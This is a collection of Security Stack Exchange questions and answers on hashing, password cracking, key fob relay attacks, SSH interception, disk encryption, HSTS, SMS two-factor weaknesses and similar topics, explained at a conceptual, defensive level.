If only the first h bits of a certain SHA256 hash H of a certain message M are known, and one had managed to successfully guess an input message M' whereby SHA256( M' ) yielded an H' whose first h bits match the known h bits of H , is there any way to formalize what the likelihood is that the guessed M' is identical to M ? ie.: Pick any M , set H = SHA256( M ) Pick any M' , set H' = SHA256( M' ) , such that: H[0..h] == H'[0..h] What are the odds that M == M' ? Given that SHA256 is expected to be cryptographically unbiased, is it fair to assume that the likelihood is h / 256 ? Bonus question: What about HMAC-SHA256, where the message is also a given but the key is being guessed? Barring an immediate answer, how would I approach this problem? Edit: My original question did not bound for the size of M . Let's assume a known fixed-length M of size m . Bonus points if you can describe a way to loosen these bounds and still formalize an approach to calculating collision odds. If any additional bounds are required in order to formalize a response, feel free to introduce and justify them. The best answers are supported by a rational that can be checked, followed and validated, not merely statements of fact. I assume the overall odds of a hash collision in SHA256 will play into the final solution. Bonus points if you can generalize your answer beyond SHA256.
{ "source": [ "https://security.stackexchange.com/questions/249489", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10268/" ] }
249,683
Password length/complexity only mitigates a brute-force attack, correct? In the event of a hash leak, since any hash algorithm has a fixed output length, there could potentially be a pre-image with a very short / not complex string? Salting notwithstanding.
Say you have a dozen people on a beach. You get each person in turn to pick a grain of sand at random and, without looking at it, write their name on it and throw it back randomly onto the beach. What are the chances two people write their name on the same grain of sand?

The size of the key-space for human-generated passwords is around 40 bits, according to Wikipedia. The key-space for most modern cryptographic hashes is 128 or 256 bits. This is such an astronomical difference in the sizes of the two sets that the overwhelming majority of possible hash values are not reachable from a typical password. The chances of a collision are like two people picking the same grain of sand on a beach. To reach a collision, you would typically have to iterate through half of the hash key-space, and in doing so you would end up with a pre-image that is likely to be far longer, and far less like a human-chosen word, than the actual original password, which would have been much easier to guess in the first place.
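The arithmetic behind the analogy, as a quick Python check comparing a roughly 40-bit human-password space with 128- and 256-bit hash spaces:

```python
password_space = 2 ** 40     # rough size of the human-chosen password space
hash_space_128 = 2 ** 128
hash_space_256 = 2 ** 256

print(f"{password_space:.3e} typical human-chosen passwords")
print(f"{hash_space_128:.3e} possible 128-bit hash values")
print(f"{hash_space_256:.3e} possible 256-bit hash values")
# Fraction of 256-bit outputs reachable from such passwords: vanishingly small.
print(f"{password_space / hash_space_256:.1e}")
```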
{ "source": [ "https://security.stackexchange.com/questions/249683", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257888/" ] }
249,728
I was reading this article about MD5 hash collisions in which it clearly states that these two strings (differences marked with ^ ): d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70 d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70 ^ ^ ^ have the same MD5 hash. Although testing this hypothesis with this MD5 generator , they do not have the same hash. The first string hashes to edde4181249fea68547c2fd0edd2e22f and meanwhile the second to e234dbc6aa0932d9dd5facd53ba0372a which is not the same. Why is it being said that these two strings produce the same MD5 hash value?
... in which it clearly states that these two strings ...

No. It clearly states "... two different sequences of 128 bytes ...". There is a huge difference between these statements. In the first, the strings are taken as they are. In the second, one will hopefully realize that these are 256-character-long strings consisting of hexadecimal characters, and that one needs to convert them to binary to get the 128 bytes. Once this conversion is done and the MD5 is computed from the actual 128 bytes, one will see that both byte sequences result in the same MD5, namely 79054025255fb1a26e4bc422aef54eb4 (matching the article). This can, for example, be reproduced by using this site and choosing bytes in format hexadecimal as input.
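Equivalently, the check can be done in a few lines of Python: decode the hex strings to the underlying 128 bytes first, then hash those bytes (hashing the hex text itself is exactly the mistake that produced the two different digests in the question).

```python
from hashlib import md5

hex1 = ("d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
        "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
        "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
        "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70")
hex2 = ("d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
        "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
        "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
        "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70")

print(md5(hex1.encode()).hexdigest() == md5(hex2.encode()).hexdigest())  # False: hashing the hex text
print(md5(bytes.fromhex(hex1)).hexdigest())                              # hashing the 128 raw bytes...
print(md5(bytes.fromhex(hex2)).hexdigest())                              # ...yields the same digest
```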
{ "source": [ "https://security.stackexchange.com/questions/249728", "https://security.stackexchange.com", "https://security.stackexchange.com/users/239149/" ] }
250,025
I've been reading a bit into car security and all of the ways cars can be stolen through various alterations of replay attacks. Upon researching whether any of the more modern cars are using anything more secure than "new code after usage", I haven't really found anything satisfying. Which makes me question, why don't car manufacturers just use something like RFC 4226 to secure the cars? It seems like an easy enough solution. Am I missing something here perhaps?
RFC 4226 (HOTP) would still be vulnerable to replay attacks in some situations. In the case of old fashioned key fobs, where you have to press a button to unlock the car, imagine someone who has brief access to the key fob while you are out of range of the car. The attacker can press the button once, record the code transmitted by the fob, and then hurry out to your car, replay the recorded code, and gain access to the vehicle. Another attack possible on this is the RollJam attack and requires only a $32 device. The device is hidden near the vehicle. When the owner comes by and unlocks the car, the signal sent by the fob is recorded by the device and jammed so the car does not unlock. The owner, naturally, tries again. The signal is recorded and jammed again, but the first signal is then replayed. The car receives the replayed signal and unlocks. Meanwhile, the second signal has still not been seen by the car so it can be used to unlock the car once the owner leaves. Modern keyfobs are designed to be passive so that you don't have to press any button for unlocking the car. As long as the fob is in your pocket, the car will unlock itself when you walk up to it and lock itself when you walk away, no interaction required. Now if you use HOTP in this case, well then all the attacker has to do is pretend to be the car and request a code while you are out of the car's range. Then record the code, go back to the car, replay it and profit. And then there is a DOS vulnerability. Since an attacker can request as many HOTP codes as they want, they can make the internal HOTP counter of the fob drift so far away from the counter in the car, that the fob will no longer be able to authenticate. (Actually, this can be an issue with normal fobs too. What happens if your child starts playing with it and presses the unlock button hundreds of times?) In fact, modern keyless fobs take a lot of effort to secure. Early manufacturers decided to implement proprietary challenge-response mechanisms. A cryptographically secure challenge response system, what could go wrong? Well, guess what the car thieves did? They simply amplified the signals transmitted by the vehicle and the fob to make the challenge-response mechanism work over much larger distances than it was meant to. So your BMW is parked outside your house and you are snug in bed having a good night's sleep. Someone walks up to your window with a special device. The device relays an amplified challenge from your car to the key fob in your room. The fob thinks the car is nearby, so it computes the response and transmits it back. The device amplifies the response so it reaches the car, and BOOM, when you wake up in the morning, your shiny new BMW is gone. So then, the manufacturers had to apply further security measures, like measuring the time it took for the key fob to respond. If it took too long to receive the response, the car would conclude that the fob was out of range. But I guess the car manufacturers have learnt their lesson by now and have more robust security (or perhaps not ).
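For reference, the HOTP computation from RFC 4226 itself is only a few lines of Python; the problems described above are not in this math but in how and when codes can be requested, intercepted and replayed.

```python
import hashlib
import hmac
import struct

def hotp(secret, counter, digits=6):
    msg = struct.pack(">Q", counter)                        # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                              # dynamic truncation (RFC 4226, section 5.3)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

secret = b"12345678901234567890"          # RFC 4226 test secret
for counter in range(3):
    print(counter, hotp(secret, counter))  # 755224, 287082, 359152 per the RFC test vectors
```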
{ "source": [ "https://security.stackexchange.com/questions/250025", "https://security.stackexchange.com", "https://security.stackexchange.com/users/258392/" ] }
251,125
At my university, we are learning how to use SSH for server administration. We learned that SSH is secure, but there are some tools that allow man-in-the-middle attacks on SSH. How can such tools intercept SSH when it is encrypted? I have tried Wireshark but was not able to read the data. Wireshark is only able to read the plain text parts of the SSH protocols. How does a man-in-the-middle attack on SSH work? The mitm tool ( https://github.com/ssh-mitm/ssh-mitm ) allows a second shell to connect to the same SSH session. I have tried it and was able to work in both shells. Are both sessions the same, or how else can this work? I thought that the encryption should protect me from such an attack. Reading the docs ( https://docs.ssh-mitm.at ) does not provide more info on how such an attack works. The docs only explain how to use the tool. This is the reason why I'm asking the question. Can anyone explain in depth how such an attack works? How is it possible that the same SSH session can be used from 2 different clients?
The basic point of a MITM attack against SSH or SSL/TLS is that the connection is no longer end-to-end encrypted, i.e. from client to server. Instead there is an encrypted connection between client and attacker and a different encrypted connection between attacker and server. Since encryption is terminated by the attacker this way, the attacker has access to the full decrypted traffic:

Secure: [Client] <---------- End-to-End Encrypted ----------------> [Server]
MITM:   [Client] <-- Encrypted#1 --> [Attacker] <-- Encrypted#2 --> [Server]

Note that this only works if the client does not check the cryptographic identity of the server (server key) and the server does not check the cryptographic identity of the client (client key, which is optional). If any of these are checked an MITM attack is impossible since the attacker cannot impersonate the server or client without having access to their secret key.
{ "source": [ "https://security.stackexchange.com/questions/251125", "https://security.stackexchange.com", "https://security.stackexchange.com/users/259557/" ] }
251,176
I use Fedora Linux and was recently looking into doing Full Disk Encryption on data drives such as /home on some of my / my family's PCs. I understand that LUKS security will be partially dependent on having strong passwords and not doing very obviously stupid things (saw some articles where people were auto-unlocking an encrypted /home partition during boot by passing a keyfile located on an unencrypted / filesystem - which anyone with a livedisc could also use those to open the LUKS container). The main reason why I am concerned was that while googling various things about LUKS / its settings, I came across this Elcomsoft article which talks about breaking LUKS encryption. If that wasn't bad enough, I also saw they had a similar article about breaking Veracrypt ... so I am at a loss as to what I should use for FDE. I admit that most of the infosec stuff is over my head. But I'm still not clear if I can make those solutions secure merely by tweaking settings/algorithms/etc or if the flaw was with something in the projects themselves (I thought it sounded like the latter). On the one hand, the article itself says that LUKS can be viewed as an exemplary implementation of disk encryption But the scary part is in the "Breaking LUKS Encryption" sections and how they make it sound like it is very easy to do with their software. Trying to google was likewise unhelpful as all of the information I could find on "how secure is LUKS?" etc either talked generically about the underlying crypto algorithms or was dated before the Elcomsoft articles. But my reasoning is that in this day and age, it is probably a bit naive to assume that all thieves that might "smash-and-grab" a PC or hard drive from someone's home are going to be technical neophytes. The cheaper of the 2 products mentioned in the LUKS article appeared to be $300 USD. Not chump change but also not unaffordable by any stretch if someone really wanted to get in. My initial guess based on these is that FDE with LUKS/Veracrypt would still be "better than nothing", but if I was unlucky and tech-savvy thieves nabbed my PC then data like Tax Records etc might not be protected. Likewise, anything I had almost certainly would not be protected from government entities or law enforce if they have access to the Elcomsoft products or similar software. Assuming I don't piss off anyone in power, the most I probably have to worry about from the "gov'mint" is saving memes or maybe keeping an offline copy of a few youtube videos... but it is troubling to think that it is so easy for FDE to be defeated. Am I reading this wrong / is it just sales "spin" from Elcomsoft trying to market their product? If it is as easy to defeat as they make it sound, then can anything be done on the end user end to better protected against? If so, what / how? When I see things like Up to 10,000 computers and on-demand cloud instances can be used to attack a single password with Elcomsoft Distributed Password Recovery. The first thing that goes through my head is to wonder if I can configure LUKS to only allow at most X attempts per minute, with X as some small number like 3 . But AFAIK this option does not exist and is nothing more than a dream...
No, Elcomsoft cannot break LUKS or Veracrypt. What they do is guess the password. Any password-based encryption mechanism can be broken by guessing the password: this is not a flaw in the encryption software. Encryption software can and should mitigate the risk of guessing by making it costly. Both LUKS and Veracrypt do this securely (at least with default settings; it might be possible to weaken the settings if you misconfigure them). They can't completely eliminate the risk of password guessing or snooping because, by design, if the adversary figures out what the password is, they will be authorized.

You can protect yourself by using a password that has a high enough entropy. (See "Confused about (password) entropy", "Calculating password entropy?", "Password entropy in layman's terms", "How can I create a secure password?", ...) Note that length helps entropy, but is not enough: a long password can be weak (for example, the first line of a well-known song would make a bad password). Special characters contribute very little to entropy and are counterproductive. A high-entropy password must be randomly generated: humans are very bad at generating entropy. Diceware is popular, though using dice rather than a computer for the random generation isn't actually more secure (except in extremely rare, usually made-up circumstances).

If you can't remember a strong enough password, you can store it (or a password-equivalent key file) on removable storage. Of course, there's then the risk of losing the device containing the key file. Or you can use a TPM and bind the encryption key to that TPM, which carries the risk of not being able to access the data if your motherboard breaks.
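To make "randomly generated" concrete, here is a minimal Python sketch of generating a Diceware-style passphrase with the secrets module; the tiny word list is only a stand-in for a real Diceware/EFF list of about 7,776 words.

```python
import math
import secrets

wordlist = ["correct", "horse", "battery", "staple",
            "orbit", "lantern", "pebble", "walrus"]   # a real list has thousands of entries

def passphrase(n_words=6):
    return " ".join(secrets.choice(wordlist) for _ in range(n_words))

print(passphrase())
bits_per_word = math.log2(len(wordlist))
print(f"entropy with this toy list: {6 * bits_per_word:.1f} bits; "
      f"with a 7,776-word Diceware list: {6 * math.log2(7776):.1f} bits")
```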
{ "source": [ "https://security.stackexchange.com/questions/251176", "https://security.stackexchange.com", "https://security.stackexchange.com/users/259634/" ] }
251,530
I have recently had an active website that was protected by an SSL certificate. The site is no longer active and the certificate has expired. I have tried to put up a simple HTML holding page, but Google will not show it because there is an expired certificate associated with the domain. Is there a solution that allows me to display the page without needing a certificate?
It sounds like your site may have been serving a HSTS header during the time when it was secured with the SSL certificate. If you are not familiar with HSTS, see https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security . In particular: It allows web servers to declare that web browsers (or other complying user agents) should automatically interact with it using only HTTPS connections and HSTS Policy specifies a period of time during which the user agent should only access the server in a secure fashion. If that's the case, then: (1) browsers that previously connected to your site by https will not be able to connect to your site by http until the HSTS directive expires; (2) browsers that never connected to your site previously will be able to connect to your site by http now. Having said that, SSL has never been simpler and less expensive to deploy (especially if you use Let's Encrypt). You might want to simply renew your SSL certificate to solve the problem of (1) above.
{ "source": [ "https://security.stackexchange.com/questions/251530", "https://security.stackexchange.com", "https://security.stackexchange.com/users/226083/" ] }
251,533
In classic hosting we have a virtual machine with limited resources allocated by the hosting provider for running our web application. But with serverless code such as AWS Lambda or Azure Functions, our code is executed by the hosting provider (Amazon or Microsoft) itself in response to events. Theoretically speaking, there is no limit to the resources that will be allocated to a Lambda function, so doesn't that mean that if an attacker wanted to take down a serverless app with DDoS, he would have to first take down the entire AWS/Azure infrastructure, which is just impossible?
There is always something that will break. While, theoretically, serverless systems can scale up your application to very high levels, there is always something that will break. Likely candidates: your database, other internal services, 3rd-party services you call while responding to requests, and your bank account. Even with a stateless endpoint that doesn't use a database or external services, a large-scale DDoS attack can still run up such a large bill from your cloud provider that you choose to shut off the service until the DDoS attack ends. It's not a new concept. Here's a discussion about it: https://summitroute.com/blog/2020/06/08/denial_of_wallet_attacks_on_aws/
{ "source": [ "https://security.stackexchange.com/questions/251533", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255548/" ] }
251,685
I have a vulnerable test site up that runs PHP. How can an attacker identify that PHP is used? If I type .../add.php the site gives back an error message, although the file is add.php. If I type .../add the site runs. Maybe I can inject code to identify PHP? Or is it impossible to check for PHP (including version) if a site is well coded? Here is the code for the test site: Elastic Beanstalk + PHP Demo App
There is no method that is guaranteed to work. The way PHP works is that the HTTP server receives the HTTP request, identifies that it's meant to be PHP and relays the request to the PHP module. This could either be a module built into the web server or be a dedicated "PHP server". The server then checks which PHP code is meant to be executed with which parameters, then executes it, generates a result and relays that result back to the HTTP server, which returns it as the HTTP response. Whether or not this process occurs, or whether or not the result received stems from a static page or any number of processes, is unknown to the user. However... There are a number of possible ways PHP could "reveal" itself. The first and most obvious is the X-Powered-By HTTP response header. PHP likes to advertise itself, and so in some installations, the X-Powered-By header is set, which reveals that the site is running PHP and which version. There is also a very strange " easter egg " in PHP, which returns specific information such as credits to the development team or the PHP logo, when a specific query string is sent. This behavior can be disabled in the configuration, so it isn't foolproof either. If it works, then it's overwhelmingly likely to be a PHP installation, but if it doesn't, you can't exactly deduce that it's not a PHP installation. Absence of evidence isn't evidence of absence, after all. Stack traces and other PHP errors, such as the beautiful masterpiece shown in this question , can be an indication as well. Of course, all of these methods only work because of some misconfiguration. On a properly configured server, it is not possible to know for sure if PHP is used or not.
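As a rough illustration, the passive header checks mentioned above can be done with a few lines of Python using the third-party requests library; the URL and the example header value in the comment are placeholders:

import requests

resp = requests.get("https://example.com/add", timeout=10)
for header in ("X-Powered-By", "Server"):
    value = resp.headers.get(header)
    # a talkative install might return something like "X-Powered-By: PHP/8.1.2"
    print(header, ":", value if value else "not disclosed")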
{ "source": [ "https://security.stackexchange.com/questions/251685", "https://security.stackexchange.com", "https://security.stackexchange.com/users/255454/" ] }
251,694
Compared to a DVD live Tails Linux, how unsafe is using the USB version? I'm trying to help a friend who for years has been mired in the laborious iterative process of remastering their own DVDs of Knoppix in the name of security. The use case: Tails Linux Only used in own laptop with no other users No HD, but does have RAM, Intel CPU, GPU, etc. Supply chain assumed safe for now Laptop considered unsafe as soon as it connects to the internet Only online banking and email No use of Tails Persistent Storage Research: Bad/Evil USB articles HW-switch locked USB flash, MBR can still be accessible user comments Tails Persistent Storage risks page Tails known limitations page Searching security.stackexchange Conclusion so far: USB is definitely unsafe (if I had to say 'safe' or 'unsafe') However, I don't know what level of effort would be required to compromise it in this use case. Are we a few years away from such scale and automation or is it already here? State-actor only? Would it be equally bad to have a DVD drive in the computer where the firmware could be compromised? Is this level of scrutiny ridiculous or not out of the question of mass automated infection or surveillance technology?
{ "source": [ "https://security.stackexchange.com/questions/251694", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260350/" ] }
251,881
We have a site that has a redirection path like so: http://www.example.com http://www.example.com/ https://www.example.com/ Notice how it goes from http to http first (added a / ), then finally goes to https. While ideally it should first go to HTTPS before adding a slash, it is what it is now. Moreover, the user's final destination is HTTPS, so my thinking is it should be secure enough. I would like to know if the above step would potentially raise any security concerns, and see if hardening is needed. Cheers!
http://www.example.com http://www.example.com/ There is actually no difference between these from the perspective of the browser and the HTTP protocol. A URL consists (among others) of a protocol ( http:// ), a hostname ( www.example.com ) and a path. An empty path is not possible and both of the URLs shown use the path / . So there is no actual redirect between these URLs since they are equivalent already. For more on this see the HTTP standard, specifically RFC 7230 section 5.3.1 : "If the target URI's path component is empty, the client MUST send "/" as the path within the origin-form of request-target." . Note that this only applies to http://example.com vs. http://example.com/ , i.e. empty path vs. / . With a path of /foo vs. /foo/ it is different since these will actually result in different requests. Moreover, the user's final destination is HTTPS, so my thinking is it should be secure enough. Since the initial request and response are still done via plain HTTP, they are not protected against manipulation by a man in the middle. For example the response could be modified or a new response injected to direct the client to a different final URL. This actually happens, see for example Internet Provider Redirects Users in Turkey to Spyware: Report . In other words: every clear-text redirect is one too many. To reduce this attack vector further, use HSTS .
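If you want to see the chain your users actually follow, a quick sketch with Python's requests library (the hostname is a placeholder) prints each hop and whether an HSTS header is present on the final response:

import requests

resp = requests.get("http://www.example.com", allow_redirects=True, timeout=10)
for hop in resp.history:
    print(hop.status_code, hop.url, "->", hop.headers.get("Location"))
print("final:", resp.status_code, resp.url)
print("HSTS:", resp.headers.get("Strict-Transport-Security"))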
{ "source": [ "https://security.stackexchange.com/questions/251881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/173679/" ] }
251,886
I am currently trying to get an understanding of multi-factor authentication. The biggest issue so far: When does "something you have" NOT get reduced to "something you know"? I want to have a "possession" factor that does not get reduced to a "knowledge" factor. I don't think this is a question that can be answered easily, but it would be very helpful if at least the following questions are answered: When I write down or store a password, is this then considered something I have? When I have a public/private RSA keypair with 4096 bits and I remember the private key without storing it anywhere, is it something I know? When I write down or store the private part of a public/private RSA keypair with 4096 bits, is this then considered something I have? As far as I understand it, "something I have" should be something I have physical access to that nobody else has. I don't see how it is possible to prove that I have something when using a web application, because everything gets reduced down to the bits sent in a request and everyone could send the same bits. How does sending a specific sequence of bits prove that I have physical access to a certain device?
When I have a public/private RSA keypair with 4096 bits and I remember the private key without storing it anywhere, is it something I know? Yes. When I write down or store the private part of a public/private RSA keypair with 4096 bits, is this then considered something I have? No. The authentication factor is not the sheet of paper where the key was written down, but the key that is written down. The key is not intrinsically connected to the paper; it can live without it. This is different from a smartcard or hardware token which contains the key. These devices are designed so that the key cannot be extracted and the device cannot be simply copied, i.e. the key basically has a single physical manifestation. How does sending a specific sequence of bits prove that I have physical access to a certain device? Take your case of an RSA key pair: In the case of a smartcard the private key is located on the card and only there. One cannot extract the key but one can ask the smartcard to sign something using this private key - since the smartcard is a tiny computer. Thus the server can send some challenge, the smartcard signs the challenge and the server can verify the signature using the public key associated with the user. If the signature matches, the client must have had access to the smartcard, i.e. it has proved possession of the smartcard. Other hardware-based tokens work the same way: the secret never leaves the hardware.
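To make the challenge-response idea concrete, here is a simplified software-only sketch using the third-party cryptography package; on a real smartcard the private key is generated and kept inside the hardware, whereas here it lives in memory purely for illustration:

import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# key pair; the server only ever stores the public half
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

challenge = os.urandom(32)  # random nonce sent by the server

# signing happens inside the token/smartcard
signature = private_key.sign(
    challenge,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# server-side verification against the stored public key
try:
    public_key.verify(
        signature,
        challenge,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )
    print("possession of the private key demonstrated")
except InvalidSignature:
    print("verification failed")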
{ "source": [ "https://security.stackexchange.com/questions/251886", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248179/" ] }
251,923
Let's say I have to leave my computer unattended and turned off for a while with some strangers, is it possible for someone to clone my HDD and SSD data?
Nothing. On a bit level, nothing stops an attacker with local access from copying the bits on your hard drive or SSD. In fact, there is hardware designed to create exact images of disks and SSDs, though this is usually done for forensic purposes. How useful those bits are depends on how your hard drive is set up. Without any encryption applied, the attacker can use the filesystem present on the disk image to read the files - just as your computer would do it. Even without an intact filesystem, techniques like "file carving" can be used, where common headers for files are searched. Basically, you look for something that looks like the beginning of an image, and then attempt to read the next sectors as if they were an image. And in the end, you may end up with a usable image, or junk. This can be protected against with encryption . Generally, there are two kinds of common encryption methods: file-based encryption and full-disk encryption. File-based encryption means the contents of some files are encrypted, and full-disk encryption means everything on the whole volume is encrypted. With both of these, the problem now becomes key management. For a full-disk encryption solution like BitLocker, keys can be generated with a passphrase and an additional TPM component. For file-based encryption, as it is used on modern Android phones , you can either use a similar approach, or use individual keys for each file, depending on your requirements.
{ "source": [ "https://security.stackexchange.com/questions/251923", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260672/" ] }
252,015
I read this blog ( cached version ) (and the related cached tweet ) about replacing TCP/IP with blockchain. Tweet: The Internet has a serious fundamental flaw: the transmission control protocol/internet protocol (TCP/IP)—the primary engine underpinning the Internet—is less secure. Is #blockchain the solution we need to eliminate this flaw? Blog snippet: Blockchain can eliminate the TCP/IP’s fundamental security flaws. An important value of using Blockchain is allowing users—particularly those who do not need to trust one another—to share valuable information securely and transfer value in a tamper-proof manner. This is because Blockchain stores data using complex cryptography and extremely difficult protocols for attackers to manipulate. ... Blockchain technology provides a secure and immediate way of transmitting digital assets from anywhere in the world to anyone in the world. But I see a lot of people are saying it's not a good replacement. But I don't understand why exactly? What are the reasons?
Blockchain is a distributed ledger. Because everyone has a copy of the data, and those copies can be verified and protected by some very clever algorithms, it makes the data stored on them reliable and secure. But "replace TCP/IP with blockchain" is a meaningless, nonsense, and click-baity phrase. TCP/IP is a transport protocol. Blockchain runs on top of TCP/IP. So, it's like saying "Roads are dangerous and not designed for personal safety. Cars have all these safety features. We should replace roads with cars." Blockchain is a distributed ledger. Who is getting a copy of all this data meant for a single party? So, it's like saying "Phones can be tapped. We should give everyone bullhorns." Sure, you can encrypt the data sent, but you then have to justify this encryption over top of and in relationship to TLS. It's not that blockchain is "not a good replacement", but rather, without quite a lot of explanation and context, it's a play at sounding cool and like one has some earth-shattering idea to use a hyped-up, over-promised technology. It's the sort of idea a couple of drunk people come up with at 2am and write on the back of a napkin. Most people see the ramblings the next day and have the good sense to throw the napkin out. Alas, this author decided to use it as a pitch to RSA to drive clicks... By the way, the author of the article in question claims to be "a 30-year veteran in the blockchain and DeFi space ..." It would appear that he wrote his bio at 2am, too...
{ "source": [ "https://security.stackexchange.com/questions/252015", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257610/" ] }
252,076
I did some research about how secure and private SMS messages are. Providers and governments can see these SMS messages in plaintext, but what is weird is that these messages are not encrypted in transit. According to my knowledge, that makes the service vulnerable to MiTM attacks: a semi-skilled hacker who knows my location can intercept the connection and get a code to reset my Google account's password, for example. Am I right that SMS is too weak to rely on for things like password resets and two-factor authentication?
Yes, you're right. SMSes are not recommended in any two-factor authentication (2FA) process nowadays. They can be easily intercepted and modified. That's why a lot of companies are recommending other alternatives: Why 2FA SMS is a Bad Idea Top 5 reasons not to use SMS for multi-factor authentication Do you use SMS for two-factor authentication? Here's why you shouldn't SMSes are considered obsolete when talking about a secure way to verify your identity. They are also affected by SIM Swapping attacks . That's why some 2FA apps that use TOTP , like "Google Authenticator", are gaining more popularity in the market. There are many examples on the Internet exploiting these weaknesses: I hacked my friend’s website after a SIM swap attack A Step by Step Guide to SS7 Attacks SS7 hack explained: what can you do about it? Exploit SS7 to Redirect Phone Calls/SMS SMS: The most popular and least secure 2FA method SMS spoofing attack vector Even with all these examples, SMSes are still used because: The infrastructure for SMSes is already implemented worldwide and changing it would be really expensive. They are a relatively easy and cheap way to implement 2FA. They can be used without special software / apps in any cellphone. For old cellphones, this may be the only way to receive a 2FA code. But no matter what technology are you using, attackers always take advantage of the weakest link, in this case, people, so they will use social engineering techniques to try to trick you so you end up sending the 2FA code to them.
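For reference, the TOTP codes those authenticator apps display are computed entirely offline; a bare-bones sketch of the RFC 4226 / RFC 6238 algorithm in Python (the Base32 secret below is just a made-up example) looks like this:

import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, interval=30, digits=6):
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval           # number of 30-second time steps
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                          # dynamic truncation
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))                      # prints the current 6-digit code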
{ "source": [ "https://security.stackexchange.com/questions/252076", "https://security.stackexchange.com", "https://security.stackexchange.com/users/260902/" ] }
252,103
No idea where to begin. I would like to ask for tips, directions and approaches when it comes to performing a penetration test of a static website. Source code analysis is not within scope for this test. I intend to run scanning tools (nmap, nikto, etc.) on the website's server.
For a static web application there are things you should and shouldn't consider (this is non-exhaustive).
Things you should consider:
- Directory traversal: Are there any directories you can access? Were these intended?
- Inspect elements: Did the developer or similar leave any comments in the client-side returned HTML?
- Server version: Despite being static, something still needs to host it! Is the nginx/apache out of date?
- Host setup: Does the host go to a domain name (trust) and are ports restricted to what is absolutely necessary?
- SSL certificate: Although there is minimal value in HTTPS on a static site, it is a baseline requirement for 2021. See here .
Things you shouldn't need to consider:
- Injection: If it is static, there should be nowhere to inject.
- Access management: No handling of accounts.
If I were in the reader's position, I would confirm the application is static, write a minimal report, and deliver quickly. I would encourage the reader to apply the Web Security Testing Guide (WSTG) to what they are doing, only picking the applicable testing steps.
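A few of the low-impact checks above can be scripted quickly; for instance, a rough sketch with Python's requests library (the base URL and probe paths are placeholders, to be run only against systems you are authorized to test):

import requests

base = "https://static-site.example"

resp = requests.get(base, timeout=10)
print("Server header:", resp.headers.get("Server", "not disclosed"))

plain = requests.get(base.replace("https://", "http://"), allow_redirects=False, timeout=10)
print("HTTP -> HTTPS redirect status:", plain.status_code)

for path in ("/backup/", "/.git/HEAD", "/old/"):   # example paths only
    r = requests.get(base + path, timeout=10)
    print(path, r.status_code)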
{ "source": [ "https://security.stackexchange.com/questions/252103", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257055/" ] }
252,446
My knowledge about these topics is very elementary, please "school me" if I said something completely wrong, it would surely help me understand these things better. Now, to my issue. Now that I have a laptop and didn't encrypt the entire disk during installation I was looking for ways to encrypt some particular folder or files. I found two different ways to protect the files but I don't grasp the difference between the two: password and a pair of public/private key. Option 1: I encrypt a file and to decrypt it I have to insert a password, I'm ok with that and understand it. Option 2: I want to instead use a pair of public/private keys. So I generate the pair and I encrypt the file with the public key. At this point, when I create the private key, I should password protect it, otherwise anyone that has access to my laptop can access and use the key and be therefore able to decrypt the file. So what's the point of using a private key instead of a password if the private key itself is password protected? Why wouldn't I want to straightforwardly use option 1? Sorry for my lack of understanding about these topics, feel free to explain it to me like I'm 5.
